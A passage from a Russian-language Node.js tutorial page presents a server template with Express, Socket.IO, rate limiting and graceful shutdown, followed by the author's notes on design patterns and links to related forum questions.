"morgan": "^1.10.0",
"redis": "^4.6.5",
"socket.io": "^4.6.1",
"winston": "^3.8.2"
},
"devDependencies": {
"nodemon": "^2.0.22"
}
} |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
| require('dotenv').config();
const http = require('http');
const app = require('./app');
const { Server } = require('socket.io');
const mongoose = require('mongoose');
const logger = require('./utils/logger');
const { connectDatabase } = require('./config/database');
// Создаем HTTP-сервер
const server = http.createServer(app);
// Настройка Socket.IO
const io = new Server(server, {
cors: {
origin: process.env.FRONTEND_URL || 'http://localhost:3000',
methods: ['GET', 'POST']
}
});
// Глобально делаем io доступным для использования в других модулях
app.set('io', io);
// WebSocket обработка
io.on('connection', (socket) => {
logger.info(`Новое WebSocket соединение: ${socket.id}`);
socket.on('join article', (articleId) => {
socket.join(`article:${articleId}`);
logger.info(`Клиент ${socket.id} присоединился к комнате article:${articleId}`);
});
socket.on('disconnect', () => {
logger.info(`WebSocket соединение закрыто: ${socket.id}`);
});
});
// Подключение к базе данных
connectDatabase();
// Запуск сервера
const PORT = process.env.PORT || 5000;
server.listen(PORT, () => {
logger.info(`Сервер запущен на порту ${PORT}`);
});
// Graceful shutdown
const shutdown = async () => {
logger.info('Получен сигнал на завершение работы');
// Закрываем сервер, прекращаем принимать новые соединения
server.close(() => {
logger.info('HTTP сервер закрыт');
// Закрываем подключение к MongoDB
mongoose.connection.close(false, () => {
logger.info('Соединение с MongoDB закрыто');
process.exit(0);
});
});
// Если сервер не закрылся за 10 секунд, принудительно завершаем процесс
setTimeout(() => {
logger.error('Принудительное завершение через таймаут');
process.exit(1);
}, 10000);
};
// Обработка сигналов завершения
process.on('SIGTERM', shutdown);
process.on('SIGINT', shutdown);
// Обработка необработанных исключений и rejected промисов
process.on('uncaughtException', (error) => {
logger.error('Необработанное исключение:', error);
shutdown();
});
process.on('unhandledRejection', (reason, promise) => {
logger.error('Необработанный reject промиса:', reason);
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| const express = require('express');
const cors = require('cors');
const helmet = require('helmet');
const morgan = require('morgan');
const rateLimit = require('express-rate-limit');
const errorHandler = require('./middleware/errorHandler');
const authRoutes = require('./routes/auth');
const articleRoutes = require('./routes/articles');
const app = express();
// Базовые middleware
app.use(helmet()); // Безопасные HTTP-заголовки
app.use(cors()); // Разрешаем кросс-доменные запросы
app.use(express.json()); // Парсинг JSON в req.body
app.use(morgan('dev')); // Логирование запросов
// Ограничение количества запросов (защита от DDoS)
const limiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 минут
max: 100, // 100 запросов с одного IP
standardHeaders: true,
legacyHeaders: false
});
app.use(limiter);
// Маршруты
app.use('/api/auth', authRoutes);
app.use('/api/articles', articleRoutes);
// Проверка работоспособности
app.get('/health', (req, res) => {
res.status(200).json({ status: 'ok' });
});
// Обработка ошибок
app.use(errorHandler);
module.exports = app; |
|
В нём я использовал несколько важных паттернов:- Разделение настроек сервера (server.js) и приложения (app.js) для облегчения тестирования.
- Graceful shutdown для корректного завершения работы.
- Обработка ошибок на уровне процесса.
- WebSocket для коммуникации в реальном времени.
- Маршрутизация и middleware.
Расширять такое приложение легко — добавляйте новые маршруты, контроллеры и модели по мере необходимости. Этот шаблон хорошо масштабируется и может стать основой для более сложных проектов.
Node.js - новый взгляд на Javascript
Наваерное, многие профессиональные, да и среднички уже слыхали о таком полезном инструменте, как... Отследить отключение клиента node.js
Подскажите, есть ли возможность отследить разрыв соединения браузером в node.js?
Пробовал и close... Запуск приложения через NODE.js
Добрый день! Хочу попробовать Javascript немножко с другой стороны, и позапускать приложения через... установка NODE.JS
Здравствуйте! Помогите, кто сталкивался с установкой NODE.JS, и у кого это удачно все закончилось)... Ошибка Node.js Unexpected token ILLEGAL
var http = require('http');
var url = require('url');
http.createServer(function (req,res) {
... Как запустить js-file в консоле Node.js?
Я запускаю консоль-терминал Node.js
пишу : node helloworld.js где helloworld.js уже созданий... node-webkit внешний вид окна
Приветствую всех! Я очень люблю слушать музыку, да недавно понял, что все существующие сервисы... node.js vs PHP
Здравствуйте, уважаемые форумчане!
Недавно наткнулся на короткий ввод в сей чудесный node.js и... Прописать правильный путь к NODE
Здравствуйте! Подскажите как правильно прописать путь к файлу. Есть написанный проект на Aptana и... node.js + apache
Добрый день, уважаемые!
Сейчас ковыряюсь с node.js. Точнее даже с аяксом, но тут (... Сервер Node.JS, отвечающий страницей Google
Добрый день. Читаю Professional Node.js: Building Javascript Based Scalable Software. Сделал... Можно ли с сервера, написанного на Node.js, передать параметры на сайт
Здравствуйте! У меня вопрос на понимание Node.js В общем, мне нужно сделать следующее: У меня есть...
|
